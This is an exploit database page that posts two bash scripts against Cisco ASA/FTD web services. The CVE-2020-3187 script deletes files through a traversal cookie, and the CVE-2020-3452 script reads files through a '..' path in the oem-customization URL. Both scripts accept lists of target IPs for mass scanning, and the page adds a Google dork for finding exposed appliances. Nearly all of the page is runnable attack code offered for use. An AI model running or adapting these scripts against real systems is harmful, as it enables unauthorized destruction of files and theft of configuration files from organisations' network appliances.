Cisco Adaptive Security Appliance Software 9.7 Arbitrary File Deletion

2020.07.30
Credit: 0xmmnbassel
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2020-3187 | CVE-2020-3452
CWE: N/A
Dork: inurl:/+CSCOE+/

# Exploit Title: Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion # Google Dork: inurl:/+CSCOE+/ # Date: 2020-08-27 # Exploit Author: 0xmmnbassel # Vendor Homepage: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html#~models # Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60 # Vulnerability Type: unauthenticated file deletion # Version: Cisco ASA Software releases 9.5 and earlier, as well as # Release 9.7, have reached end of software maintenance. Customers are # advised to migrate to a supported release that includes the fix for # this vulnerability. # CVE : CVE-2020-3187 #!/bin/bash delete="csco_logo.gif" helpFunction() { echo "" echo -e "\t\tCVE-2020-3187" echo "" echo "Usage: $0 -l targets.txt -d csco_logo.gif " echo -e "\t-l for list of IPs in text file" echo -e "\t-d file to be deleted, default: ./+CSCOE+/csco_logo.gif" echo -e "\t-i for single IP test" exit 1 } while getopts "l:d:i:" opt do case "$opt" in l ) input="$OPTARG" ;; d ) delete="$OPTARG" ;; i ) website="$OPTARG" ;; ? ) helpFunction ;; esac done #if $website is empty or $input is empty if [ -z "$website" ] && [ -z "$input" ] then echo "Some/all of the parameters are empty"; helpFunction fi #usage if [ -z "$input"]; then status=$(curl -LI $website/+CSCOU+/$delete -o /dev/null -w '%{http_code}\n' -s) echo "checking if $website has the $delete file" if [ $status -eq 200 ]; then echo "$website/+CSCOU+/$delete exists, deleting it..." curl -H "Cookie: token=..//+CSCOU+/$delete" -v -s -o resultsindv.txt $website/+CSCOE+/session_password.html delcheck=$(curl -LI $website/+CSCOU+/$delete -o /dev/null -w '%{http_code}\n' -s) if [ delcheck -eq 404]; then echo "Deleted!, $website is vulnerable to CVE-2020-3187." else echo "Cannot Delete $website/+CSCOU+/$delete file, check it manaully!" fi else echo "$website/+CSCOU+/$delete doesn't exist!" fi else while IFS= read -r line do echo "Checking $line if file $delete exist.." #echo $response status=$(curl -LI $line/+CSCOU+/$delete -o /dev/null -w '%{http_code}\n' -s) if [ $status -eq 200 ]; then echo "$line/+CSCOU+/$delete exists, deleting it..." curl -H "Cookie: token=..//+CSCOU+/$delete" -v -s -o results.txt $line/+CSCOE+/session_password.html #for no verbosity #curl -H "Cookie: token=..//+CSCOU+/$delete" -s -o results.txt $line/+CSCOE+/session_password.html delcheck=$(curl -LI $line/+CSCOU+/$delete -o /dev/null -w '%{http_code}\n' -s) if [ delcheck -eq 404]; then echo "Deleted!, $line is vulnerable to CVE-2020-3187." else echo "Cannot Delete $line/+CSCOU+/$delete file, check it manaully!" fi else echo "$line/+CSCOU+/$delete doesn't exist!" fi done < "$input" fi #!/bin/bash read="%2bCSCOE%2b/portal_inc.lua" helpFunction() { echo "" echo -e "\t\tCVE-2020-3452" echo "" echo "Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua " echo -e "\t-l for list of IPs in text file" echo -e "\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua" echo -e "\t-i for single IP test" exit 1 } while getopts "l:r:i:" opt do case "$opt" in l ) input="$OPTARG" ;; r ) read="$OPTARG" ;; i ) website="$OPTARG" ;; ? ) helpFunction ;; esac done #if $website is empty or $input is empty if [ -z "$website" ] && [ -z "$input" ] then echo "Some/all of the parameters are empty"; helpFunction fi #usage if [ -z "$website"]; then while IFS= read -r line do name=$(echo $line | cut -c9-19) #echo "testing $line" filename="$name.txt" #echo $response status=$(curl -LI $line"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read -o /dev/null -w '%{http_code}\n' -s) if [ $status -eq "400" ]; then echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!" else wget "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt if [ -s $filename ]; then echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..." echo "downloaded!, $line is vulnerable to CVE-2020-3452." else echo "not vulnerable!" rm -rf $filename fi fi done < "$input" else name=$(echo $website | cut -c9-16) filename="$name.txt" status=$(curl -LI $website"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read -o /dev/null -w '%{http_code}\n' -s) if [ $status -eq "Bad Request" ]; then echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!" else echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..." wget "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt if [ -s $filename ]; then echo "downloaded!, $website is vulnerable to CVE-2020-3452." else echo "not vulnerable!" rm -rf $filename fi fi fi


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top